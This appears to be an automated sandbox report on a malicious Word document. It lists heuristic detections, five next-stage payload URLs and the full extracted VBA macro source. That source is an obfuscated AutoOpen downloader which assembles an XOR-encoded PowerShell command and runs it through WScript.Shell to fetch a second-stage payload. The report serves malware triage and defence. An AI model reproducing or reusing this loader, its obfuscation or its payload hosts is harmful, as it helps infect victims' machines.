MALICIOUS
290
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
The sample contains a VBA macro with an AutoOpen function, which is a common technique for malicious documents. The macro utilizes WScript.Shell and CreateObject to execute commands, specifically referencing 'wershell ' which strongly suggests the execution of PowerShell. This indicates the document is designed to download and execute a secondary payload.
Heuristics 10
-
VBA macros detected medium 5 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
WScript.Shell usage critical OLE_VBA_WSCRIPTWScript.Shell usageMatched line in script
mNQjSE = OwOwV + NwcMzw * 4965 * 88499 + 96577 - KMmSc - 84393 / NfRTtG - QjhkO / sIRlf / lCjvG - nuGXf / mWAAQD + TpLwO * RfnZB / BnMGuh jklGNtSjo = hdoWV + CreateObject("Wscript.shell").Run(rVzsvizbA + Chr(vbKeyP) + VLXPwCtKFV + Chr(vbKeyO) + zMHaqSPQ + LZdAuKDOEw, 769671790 - 769671790) BwYfji = iIMmA + WjzhLn * 24899 * 99705 + 52994 - wHiItZ - 1673 / FqBbb - aRIFq / jUSMP / EwNHSo - WZXAVc / HMhJj + EwGtfH * XvioV / wUCmzX -
CreateObject call high OLE_VBA_CREATEOBJCreateObject callMatched line in script
mNQjSE = OwOwV + NwcMzw * 4965 * 88499 + 96577 - KMmSc - 84393 / NfRTtG - QjhkO / sIRlf / lCjvG - nuGXf / mWAAQD + TpLwO * RfnZB / BnMGuh jklGNtSjo = hdoWV + CreateObject("Wscript.shell").Run(rVzsvizbA + Chr(vbKeyP) + VLXPwCtKFV + Chr(vbKeyO) + zMHaqSPQ + LZdAuKDOEw, 769671790 - 769671790) BwYfji = iIMmA + WjzhLn * 24899 * 99705 + 52994 - wHiItZ - 1673 / FqBbb - aRIFq / jUSMP / EwNHSo - WZXAVc / HMhJj + EwGtfH * XvioV / wUCmzX -
Payload URL decoded from an encoded PowerShell loader (5 URLs) high OLE_VBA_ENCODED_PS_DROPPER_URLA VBA macro assembles (from literals scattered across helper functions) a WScript.Shell command that runs a PowerShell stage-2 loader whose download URL is hidden in a numeric char-code array — decoded at runtime by [char]($_ -bxor k) (or +k / -k) after splitting on obfuscated delimiters. The decoded hosts (often an @-separated fallback list dropped to %TEMP% and executed) are the next-stage payload URLs, never contiguous on disk; surfaced as IOCs. Self-validating: only a transform yielding a valid host URL is reported.
-
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXECCompiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
-
AutoOpen macro low OLE_VBA_AUTOOPENAutoOpen macroMatched line in script
Attribute VB_Name = "TVBWWOiAtYtk" Sub AutoOpen() On Error Resume Next -
Reference to Windows Script Host high SC_STR_WSCRIPTReference to Windows Script Host
-
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXECOLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
-
Suspicious extracted artifact medium EXTRACTED_FILE_STATIC_TRIAGEOne or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://www.dinafiler.se/0mG1fU7ud/ Referenced by macro
- http://www.atfaexpo.vn/Messages-2018/f7fc54gDI/Referenced by macro
- http://anantaawellness.com/TFLLjCZ/Referenced by macro
- http://www.salmix.com.br/6k7mXEEF/Referenced by macro
- http://www.geckochairs.com/H9gozcqlX/Referenced by macro
- http://schemas.openxmlformats.org/drawingml/2006/mainIn document text (OLE body)
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 15875 bytes |
SHA-256: 4960b5e9fe6d152eff47319806b4a898b96b9c4a939c967888f44f5beeeb0d93 |
|||
|
Detection
ClamAV:
No threats found
Obfuscation or payload:
likely
300 of 554 identifiers look randomly generated (e.g. 'TVBWWOiAtYtk') — consistent with name-mangling obfuscation.
|
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "CBzXuqZ"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Attribute VB_Name = "TVBWWOiAtYtk"
Sub AutoOpen()
On Error Resume Next
CQPHD = ViIBcr - hKYMcE + (30894 / OzallV + 24204 - aijMLb * 66162 * cilUV)
PSoPjt = HLTAJn - pWRJI + (506 / WsiQGb + 4579 - tSvZbh * 15372 * WmTmSS)
qjEXpi = XIBtuB - HSbdA + (60214 / FWHno + 96017 - kLFYup * 20531 * iowwo)
LCnPh = RcLVD - ZJwdRt + (46603 / AEjMl + 63493 - uXpNQD * 53455 * NSMUd)
OnUWC = LvqiU - GkNwkA + (69882 / mzwUzL + 9910 - onhBrw * 81997 * nQmlfp)
WEwjZ = hDvOt - RqzXqG + (48305 / CASHH + 88657 - JUOwPz * 55119 * QDcffG)
TJOKE = OAzChB - XUbka + (10238 / jDMiz + 13908 - fjLpD * 16440 * wUZdM)
mnzOZr = tvfGiR - lobfc + (46916 / jQdnoQ + 67185 - ObuAS * 27851 * JsUmVa)
VzkBLjhiZiqM (HjvYNXEdDFb + YsEzMMioTz + wHcdwuj + zGukHbM)
FNcrS = IHoRj - PAmPw + (61541 / zXjRo + 24197 - ssaABG * 27815 * UTbUP)
wzqRbd = HahXtS - hVvnf + (76719 / QhoPc + 95317 - jTocQ * 57314 * YszNir)
hvBmoV = FqzOC - JJAjj + (284 / KVbMtf + 39259 - ipvJhd * 89205 * rIoTz)
RtcIoz = wXnpb - hSBCw + (61821 / bHsvc + 77895 - Idvaw * 93550 * znMGow)
End Sub
Function HjvYNXEdDFb()
On Error Resume Next
cllcL = nssca + GjXIJW - (53855 - ULpGAf + (63139 / 40436 + (aBpppp - ZtbbZJ)))
kQTFI = Jwzpv + Rwfbfi - (35740 - SblpR + (82724 / 89855 + (QuADKJ - phZYR)))
KVqCzN = hCBLEF - RztYu * ZUzBp * 24131 + zwnQcP - oOLJi * DscoB + twpdw + (VNZpWo - kmfkO / joibCl - qaAhrK)
mTiJTq = GCzwr + wzhXH - (26200 - SOKVm + (83016 / 25277 + (vNrzM - bRHWRY)))
rAjscQhX = "wershell " + " " + " " + " " + " . " + Chr(40) + " $PsH" + "OMe[4]" + Chr(43) + "$" + "pShOm" + "e[34]" + Chr(43) + "'x" + "'" + Chr(41) + Chr(40) + " " + Chr(40) + " " + "'14s72" + "%123A108" + ",23t6"
uWivjq = Dtvwc + sMCZlZ - (18753 - rHhMO + (37755 / 41153 + (NLJrd - nhtXh)))
iMKvH = qEwUz + vHDOB - (68170 - Xwvfk + (75181 / 70792 + (kYUjNr - uizlEu)))
bBzuu = jtSvs + wjJfi - (76329 - JaiEp + (83644 / 69471 + (rptGK - rqZlv)))
SOpzz = wNZvJ + mHIvt - (94366 - CKQoD + (46876 / 79720 + (FFsjuj - wukkF)))
XjOKwchom = "8%79A" + "93_7" + "f69A72%64" + ",79,73" + "_94z10X1" + "00u79A94," + "4t125" + "u79s72" + "%105t70A" + "67f79t68"
tmwAXw = iwHAR + rXrZR - (56953 - CVIAZ + (96554 / 10290 + (mwvzIC - iihss)))
MDMhfX = QaDSLp + XdvbY - (82152 - vBLAJ + (98277 / 57194 + (IrZlNp - wTtbQ)))
RLsLzv = EZjJF + WjhaI - (43275 - Ffcol + (35957 / 13752 + (ZRPiX - hkmYno)))
jzoWIh = LzXdi + XljEa - (62388 - JiHQfi + (30587 / 78186 + (uBUhzY - oSdkoB)))
dUCkb = "t94f1" + "7,14" + "u78,105_7" + "1%23,1" + "3A66s" + "94t94X" + "90z16" + "t5A5X93," + "93f93,4f" + "78A6" + "7_68X75_"
pKuTWr = AzziCV + MjHEs - (44164 - QqBiWw + (11599 / 88187 + (kjwjU - bHtpS)))
XjXUN = OFjCUR + ZTtlz - (90419 - GaOwG + (73536 / 79488 + (HzKCEM - JdOJJr)))
LtcoSc = BnGTBs + BAhWY - (20826 - SMtab + (70433 / 9930 + (chzZck - jLqWn)))
VlFjVY = vmXDF + tjiOr - (84934 - UKYWbQ + (62376 / 88070 + (VjBXi - aorGMo)))
HNlblEYhca = "76u67u7" + "0f79s8" + "8f4f89,7" + "9u5s26u71" + "z109u27" + "t76," + "127%29u95" + "z78u5" + ",106z" + "66,9" + "4X94u90," + "16%5"
GZCcj = rJfdTH + MznMkF - (32868 - TIORu + (32690 / 73291 + (nfSHd - jRObwv)))
jatRfN = TjAMu + mRoLp - (46631 - zswAz + (97073 / 29964 + (VwIJV - khUzOD)))
niLfav = iWtuzJ + SZOazQ - (96498 - rRNvfJ + (29900 / 43619 + (ldSmjm - LtDZcQ)))
GDvrE = jMbpC + uRfPkS - (212 - ITqLl + (75548 / 74519 + (EMYIa - GskSL)))
dzVOsIzVHw = "A5,93s9" + "3,93s" + "4f75" + "f94," + "76f75s79" + "_82A9" + "0z69"
isOqJM = rwfzRi + LhQdo - (92380 - CdNtqm + (35038 / 72569 + (dwCTLS - YQrcHh)))
ubWjJ = iqUjNc + AzTaO - (10139 - CzOPt + (85532 / 84978 + (MwTWUF - RUFIB)))
sGiGNV = RdClY + fqcsRh - (95583 - zirCYY + (5330 / 69304 + (MaUbF - TumdFz)))
vWliEt = chhGl + YmDozH - (64720 - qLDOa + (9529 / 17159 + (fEssEm - RuTJf)))
DXZjGacvcJz = "%4,92t68" + "%5z103," + "79f8" + "9u89_" + "75f77" + "X79,89s7_" + "24_26" + "z27f18" + ",5,76A2" + "9_76A73s"
HjvYNXEdDFb = rAjscQhX + XjOKwchom + dUCkb + HNlblEYhca + dzVOsIzVHw + DXZjGacvcJz
WQaKZ = CNuKFQ + uivzTQ - (65601 - VAczoP + (79615 / 30863 + (HvLus - SvWLu)))
DjBIZD = jqCzLL + QwNkX - (24442 - ZCJEwB + (44242 / 54770 + (zFnCR - bpPLu)))
ndTGj = obzRN + dVvMH - (75329 - smdYP + (82628 / 14774 + (ifzUF - nPVvJ)))
oDQPi = UqjXF + SsJdJ - (9940 - PbtGw + (96558 / 93969 + (wqGZQ - dcoWOt)))
End Function
Function YsEzMMioTz()
On Error Resume Next
CwjCwE = oDdKKw + pVCMCl - (41975 - aiZGi + (19749 / 40041 + (tJXfa - AijcY)))
nRlHwo = jttlAO + VAdsaR - (37218 - kBmRNW + (40765 / 38754 + (ZNuiIw - KqhlR)))
fEwAir = Uiloiz + drDdBY - (8313 - EsXJjw + (44550 / 45898 + (LSOuw - ENKcH)))
MQFEn = jllJWi + zGcZHw - (94888 - PcPjk + (59374 / 63369 + (PqvwSs - SEwFom)))
nCVzRBqrA = "31X30%" + "77u110X" + "99X5s10" + "6z66z94" + "t94t90" + "u16z5A5s" + "75z68,7" + "5f68z" + "94f75u" + "75A9"
IJjwS = DmpZVm + kLOdG - (82865 - NtfjS + (44387 / 9856 + (OzEdD - OQlAna)))
PsSoij = XHIlYC + PiCiv - (49842 - YrVsiF + (41839 / 88951 + (dSQZzB - rjnJq)))
XXQpz = FnCGIv + kUfaGN - (49677 - MmUFN + (7220 / 22788 + (jjhakd - AXZVP)))
XHljaM = fQaXrn + kwkjv - (86924 - SXaUz + (12306 / 10174 + (ChsKUo - iWmrPC)))
TlpqAqYbUPu = "3s79z70t" + "70,68" + "u79X8" + "9s89z4X" + "73u69A7" + "1t5f12"
kouApK = lmVjpj + iETlQ - (89817 - sskHGh + (61883 / 47581 + (IPnDB - CvUImR)))
OsDKoY = jiuCz + wJsicz - (24401 - NQBcw + (85536 / 4846 + (QIHPJ - sEwtHQ)))
oTFAs = miVsAl + AzwAdZ - (55758 - fSHdJN + (33538 / 20580 + (HQwRDB - hNWHuH)))
QnFBPv = KjNcIA + XjlVYb - (70484 - mawwJS + (30853 / 5855 + (kYsrp - MCPLw)))
FwbEDsKXn = "6u10" + "8_102" + "s102," + "64_10" + "5%112," + "5u106s6" + "6f94_94" + "f90%16X5"
XfPkLR = YFOfj + diSBO - (17474 - QFCzQi + (65065 / 50648 + (tmfZb - RkYUBW)))
DmzLi = iJYah + URcSU - (56203 - kILbAK + (61096 / 831 + (ictHN - BQzFA)))
iVlEJp = CmjpEP + bBhpj - (10489 - Nluki + (36511 / 33575 + (mipvji - PYpCKV)))
cSKtcQ = ODaLY + jrTaW - (51199 - AzzJf + (36462 / 63725 + (IAdvpj - baoqA)))
rwwhsDrP = "z5,93" + "_93,9" + "3,4t89" + "f75t7" + "0A71A6" + "7z82" + ",4z73" + "%69A71u" + "4A72z8"
cRGHRL = lKWRli + iuvQjo - (57937 - zHLFET + (11872 / 71512 + (BAlcY - VidiZm)))
kIQCvV = vnpHwU + vLGLfZ - (3278 - ksUKG + (50283 / 64820 + (GEsRX - pBYkn)))
vGULzI = LpSEr + lEsKz - (2255 - FRavj + (50998 / 7664 + (QMSPd - oCqQC)))
YpYPY = obzJF + DzWif - (48009 - XEqucz + (78769 / 26783 + (wCBuv - dQtLXd)))
dwdJuNYHzDj = "8u5t28" + "_65z29_7" + "1t114z" + "111f1" + "11u108" + "t5A10" + "6u66X94" + "t94%90" + ",16,5,5X" + "93z93_" + "93,4"
ZOFkz = VPUvm + GGTKR - (632 - DljfG + (53079 / 19044 + (sJiii - jmSvh)))
bFmwDX = WpDsjw + UfpjwJ - (79803 - dGlREJ + (45042 / 39316 + (OkQiw - lbjwnj)))
OLifD = ZWWWuN + UYYhkO - (45451 - hiCDD + (54629 / 86480 + (Enulc - YOpGS)))
KjjJf = CiQUnV + Mjdbb - (99931 - jARjA + (53223 / 3887 + (zJsdw - CwwtY)))
wwPlvwP = "_77_7" + "9u73%65" + "f69%7" + "3u66s75" + "A67s88_" + "89f4z73,6" + "9z71X5t9" + "8X19t77f6" + "9%80z" + "73X91" + ",70X11" + "4_5A13X4%"
BCCio = Ovjqk + dtidv - (80606 - jHRBb + (39588 / 70468 + (LKLJi - dKknw)))
EflQt = jjCSjk + vEHkBa - (19585 - HCkVh + (3897 / 52839 + (jzpzi - BWAHBk)))
QBfwiE = jwXucc + MlSVzV - (5154 - wiBWjE + (14735 / 29031 + (CPopj - FbTYSS)))
VFVTY = QbnOln + zzMXr - (52647 - LsMnqc + (99747 / 25595 + (jzkLkM - AMjRwl)))
cfnXqifrMzw = "121z" + "90u70A67" + "u94,2" + "u13A" + "106,13" + "u3%17%" + "14A80z112" + "f98X1"
fPdwww = blbGPX + uTXpvT - (23335 - dFhSb + (28313 / 44755 + (QMKvl - MqqSU)))
hQuzm = Jpjbh + jamXQ - (57804 - VEVLt + (8887 / 52575 + (aHhzc - wXNLkf)))
ztbbh = UVZjMn + zcAuM - (46992 - iSVtm + (94643 / 93441 + (ljtZZ - IJIuz)))
GiJNc = XBYVG + ccSjXh - (77916 - rRkppn + (28165 / 8781 + (TrAMKB - JHQcZ)))
QKOSaZLAB = "0%23,10_1" + "3,18t" + "29z25,13" + "t17z14X11" + "0,94f88," + "23X1"
YsEzMMioTz = nCVzRBqrA + TlpqAqYbUPu + FwbEDsKXn + rwwhsDrP + dwdJuNYHzDj + wwPlvwP + cfnXqifrMzw + QKOSaZLAB
QAoiwt = MIoEm + iqNYmO - (5614 - YawXtf + (69276 / 65198 + (BmjQt - EjwqPK)))
woKiIZ = QmusCr + qHDOn - (57884 - mRFTpO + (17203 / 78122 + (YniwdK - OWKzH)))
Fhjpi = MLioZ + zzJLF - (336 - LHjiCc + (7996 / 15713 + (DYLjwE - WpVPA)))
ssSHm = wpLILr + IWzdN - (51374 - cIJctO + (86346 / 68975 + (WjlswP - PvpYJv)))
End Function
Function wHcdwuj()
On Error Resume Next
locDzD = jRiEL + sMMwwj - (83001 - zXAvO + (38108 / 92876 + (OXirwS - XwMjsH)))
BuTnGM = iovASm + bHkjH - (78835 - GZTja + (32783 / 79267 + (jzwMMV - caNjL)))
roNBC = ctbbj + KWEKTL - (48340 - wWEYtv + (60525 / 89060 + (rcidWZ - GnLuL)))
wLwITo = DDzai + VkoIG - (67398 - EkzCLn + (93935 / 77180 + (jziQz - sakbr)))
OaBQVXpiz = "4f79X" + "68f92s16" + "_94t" + "79X71f90" + "X1f13A118" + "u13f1f14" + "s80s1" + "12s98u" + "1u13%4u"
ppkJN = FnhoFV + oUAELC - (12195 - RviXf + (65412 / 69850 + (IIMnK - nbfDfZ)))
VzDbiI = oImSfv + uGmiJ - (40314 - YfsilL + (63541 / 46426 + (HWhWw - avAZDL)))
jjrdjd = qczlSj + UzGjvr - (62085 - wCGZw + (42994 / 59538 + (WYdSW - cDunuG)))
zMtca = dUhnUE + lpWGhY - (22844 - dMoRX + (58491 / 44251 + (lIwZz - pNzVl)))
jVljzozn = "79u82,79" + "A13s17,76" + "A69,88f7" + "9%75A73" + "u66t2z1" + "4X126s" + "91u80" + "u10f6"
hHQAQ = bsMcwO + FbVEik - (75823 - jMwDop + (6485 / 59075 + (OMfanR - LDoOTB)))
ujfuzv = FpSTB + RzbsYN - (73111 - liPSK + (55965 / 85376 + (vYZilE - JvDjP)))
WtHOF = VtVWEw + SKttwz - (32398 - ivwZbw + (60544 / 81601 + (jRbYIw - WGoCfl)))
dZzfQ = HdEuQ + wJoiwq - (5884 - mnUYJM + (37475 / 43532 + (LODsvV - bRPoaG)))
ajCCvSN = "7u68" + "s10u" + "14z78%105" + "t71,3X" + "81,94f" + "88f83" + "X81f" + "14z7" + "2t12"
iGNaX = DuRaoq + zMsWQB - (93967 - XMAHKi + (13937 / 77567 + (cwlmV - OSkIY)))
dabwd = whlUPF + GtMTMD - (92188 - KwsEG + (59086 / 95996 + (DftYat - YJjnIH)))
XMHlW = ObwqFP + IzPcp - (35231 - atutW + (17524 / 25569 + (RzUiWF - VIjnC)))
DziUPY = YuSOQw + dSNONN - (76042 - zVbsI + (88404 / 53685 + (vBQoX - LZHkRB)))
CBjNBFBVSDA = "3A108A4t1" + "10_6" + "9z93A" + "68f70_69," + "75t78z10" + "8X67s7" + "0s79u2X14" + "t126_91" + "s80_6f1" + "0%14"
tVrfvB = AYMPP + POwFN - (96203 - QvqYk + (52002 / 21643 + (cNCPOQ - WwKLbM)))
vGkIQ = Tjfcn + iwfTuU - (81234 - YLJzBw + (37724 / 85617 + (vCWLsz - ncKzQs)))
HjjCO = CzYFc + ScjtX - (30849 - DhpWj + (19214 / 25097 + (nJfPn - pqLYEQ)))
bEHovU = JoPJXI + oRKzs - (2454 - Opspp + (13343 / 56009 + (YUSzXc - iilplw)))
IKLlYdrFkEa = ",110X94,8" + "8z3z17f" + "121A94" + "u75X88,9" + "4,7t122f" + "88%69A7"
WfiOoX = EWids + ZGZqbk - (62632 - usldw + (88382 / 23882 + (VzNEOz - fwFizU)))
WlojYi = nVjITc + wkpdMQ - (3154 - Qoccit + (84670 / 42988 + (ivCWA - PViGii)))
abnhwr = PqlWzk + kGUtaj - (70363 - ROqzuj + (35808 / 18996 + (ZfciYN - WBVfL)))
osOnCV = DpIzAK + rzwwz - (63700 - zTHOMt + (10943 / 44551 + (OEOja - kHdzTo)))
tQkjMci = "3u79t" + "89_89u" + "10u1" + "4f110z9" + "4X88s17z" + "72%88t" + "79,75z65u" + "17u87%7" + "3X75A94A7" + "3t66A81"
sjZoWJ = QXMPA + vqzzhj - (72187 - mWlOu + (81497 / 67329 + (VLaPIB - JtlQcu)))
Edijl = jTYhv + GJoabT - (55510 - BApljt + (227 / 81544 + (vSIcf - IfLFM)))
vvUpiN = EkEpn + AGvAp - (90357 - jZXZQw + (91189 / 49007 + (iJTEm - hHoKiG)))
wqMifp = aiQni + WXvYmS - (81889 - FuWiiH + (49607 / 77961 + (iQsjb - MiQGQh)))
wjvRJaV = "f87u87' -" + "split 'Z'" + " -spLit" + "'U'-spLIt" + "'F' -SP" + "LiT'" + "t' -SPL" + "it','-sP"
wHcdwuj = OaBQVXpiz + jVljzozn + ajCCvSN + CBjNBFBVSDA + IKLlYdrFkEa + tQkjMci + wjvRJaV
DAYGL = SlPfd + LqmZIU - (46125 - CMVoqI + (35228 / 72464 + (vRMiM - iLtunY)))
kMYrTB = EhjEj + rfkPD - (71310 - iTNQBz + (98028 / 7872 + (OakGH - IPzpRf)))
CnsTi = jUTKzz + EDnzz - (83383 - sPdOn + (95885 / 53302 + (fuPOPU - NwRAwT)))
klVJI = OUiLNr + nJijl - (37098 - pYvjjz + (11037 / 81769 + (jzsCXf - sipBcK)))
End Function
Function zGukHbM()
On Error Resume Next
GsFWi = zUjwO + hXGAY - (37625 - nJXzL + (55420 / 6492 + (IDLqf - tGkcT)))
AYiGXo = WKPkmo + aDjtt - (88755 - wpQUHi + (98665 / 76000 + (WYFWz - iRbWu)))
OlIwBA = adqCr + QzHpT - (4419 - qSGTa + (5810 / 30051 + (UQOUB - FcIDzw)))
nkjiO = LJIJVO + GvioXw - (69971 - GNciqb + (21025 / 43064 + (mWDBDh - lLIEN)))
fnUmjcB = "lit'_' -s" + "PLIT" + "'S'-s" + "PlIt'X'" + " -Sp" + "LIT'%'-"
ImFGnv = zqDVkW + mHdHYj - (89484 - oBRiN + (15262 / 74449 + (rSNCIU - Fmhbn)))
noPGF = Fttta + HzDpEi - (53110 - GMCWU + (44653 / 35147 + (YUrHHb - NCcHs)))
DsTYCb = qXqiYW + iNlPG - (66703 - usMhSE + (22150 / 48185 + (RXzts - zvFGFz)))
jpjAvf = fLQMw + zHrkW - (66202 - GYLZc + (22057 / 71750 + (qKzdl - MWARJ)))
HRoIppphZwK = "SpLit 'a'" + "|FOR" + "EaCh{ [CH" + "aR]" + Chr(40) + " " + "$_ -BX" + "Or'0x2A'" + " " + Chr(41) + "}" + Chr(41) + "-jOi" + "N'' " + Chr(41)
OclAm = uoFPO + UBijTp - (63098 - OTCGN + (89571 / 49431 + (nNJoA - JBUYi)))
IYCsUM = phFqVS + Gvaim - (85270 - kArGaz + (26165 / 83493 + (LvLvwp - JmANj)))
qwZnRB = OQiwA + Salsmi - (93987 - UYBSd + (60489 / 91348 + (mbaidP - djCVv)))
ImsHf = abKqZ + QVZXUn - (42458 - YdGYRw + (4897 / 24519 + (IjMBr - lJLwV)))
MbJJIULZh = ""
zGukHbM = fnUmjcB + HRoIppphZwK + MbJJIULZh
uBwkS = drnDtd + sZKRDN - (26097 - BAonP + (44196 / 34417 + (tbfmKP - AWccbz)))
nEdcHz = TVckKs + KwCOL - (215 - bOqidi + (19132 / 90312 + (kmOUMj - nPUPa)))
iXoWlA = aplmz + XLmuN - (37371 - DtvJWQ + (31437 / 59010 + (smiDJ - TRDON)))
CWJZzb = FWrnu + XociAU - (69294 - KwzHuO + (9552 / 83104 + (rwGVA - lkYpz)))
End Function
Attribute VB_Name = "mwLtdfp"
Function VzkBLjhiZiqM(zMHaqSPQ)
On Error Resume Next
blojS = PfoUAl + YGOjYC * 3562 * 93746 + 38522 - ZjNkb - 48689 / dcKStm - jXQCTK / UwwsP / MzjBW - ZOzEL / FMrYaP + TizBmz * JGEnRs / NPdsI
AtMzHV = PlCPwE + AKidK * 92100 * 71219 + 66347 - KAIwm - 2601 / PuYkB - wMiLV / AVtii / OPTvT - vRsBzw / BOOmU + UTpMR * zaVifR / ZvYmD
OlQGCP = WHbsu + XVrkn * 45058 * 96027 + 41720 - NwiHtT - 90930 / nUnwVR - ZBqoqG / nDUWFV / OrFPUX - buVAb / oYGQB + KKljJ * mXJbmX / ZzZdi
aoPkLT = tJAibB + FUpOz * 17708 * 46506 + 84340 - jHjdAz - 2403 / tsKUVS - isDOiS / blvGY / QrdHiH - ccqnuI / pjqij + wjEGJ * OSjzi / aMZBOD
Fiwhn = ftwFs + MNvkc * 57369 * 575 + 36323 - MCjrG - 90918 / ajqOT - jFPbjh / iWkIKX / iaGth - RscOq / PZTOPi + OjpUAu * USqSb / jbbzdw
CcVAJ = ummWuJ + HzKAi * 80493 * 12741 + 70730 - rCKjE - 18278 / Yamum - jAdnL / QTpabz / wlArwc - slSpcj / SNwIPl + NJWrdb * qBbjh / LiXip
LRFMKt = vwsKs + OYLaaG * 33752 * 62422 + 77856 - AUFci - 97449 / PFSjs - OcADLT / mchJj / bmjoQD - uErFQ / wYdEZ + VdzzZ * GMUkX / vwAWmj
mNQjSE = OwOwV + NwcMzw * 4965 * 88499 + 96577 - KMmSc - 84393 / NfRTtG - QjhkO / sIRlf / lCjvG - nuGXf / mWAAQD + TpLwO * RfnZB / BnMGuh
jklGNtSjo = hdoWV + CreateObject("Wscript.shell").Run(rVzsvizbA + Chr(vbKeyP) + VLXPwCtKFV + Chr(vbKeyO) + zMHaqSPQ + LZdAuKDOEw, 769671790 - 769671790)
BwYfji = iIMmA + WjzhLn * 24899 * 99705 + 52994 - wHiItZ - 1673 / FqBbb - aRIFq / jUSMP / EwNHSo - WZXAVc / HMhJj + EwGtfH * XvioV / wUCmzX
wpCzQ = jEEzMV + zSvDLO * 22807 * 38001 + 55545 - jtpUl - 66599 / SmVUJp - iFNYr / pmmXY / GYnMao - oWFai / VcjZAW + caYFAm * VMtHSv / bDfZvf
HvEon = VGLwP + BtLGj * 80118 * 7813 + 80028 - SFYmii - 32430 / IfCDY - jiCUrk / HQZdUG / ThjaRP - qfCEsE / CRNHdH + YiVMFw * ozIOX / Cbwbm
wjncBk = SYPHU + LInoGG * 98828 * 28514 + 3173 - BKmJzn - 95204 / kTzBi - NTPsAw / izzVb / ntXzSv - lSOaEi / vWBhKZ + bmqHOF * TMpoWA / aNWfG
End Function
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.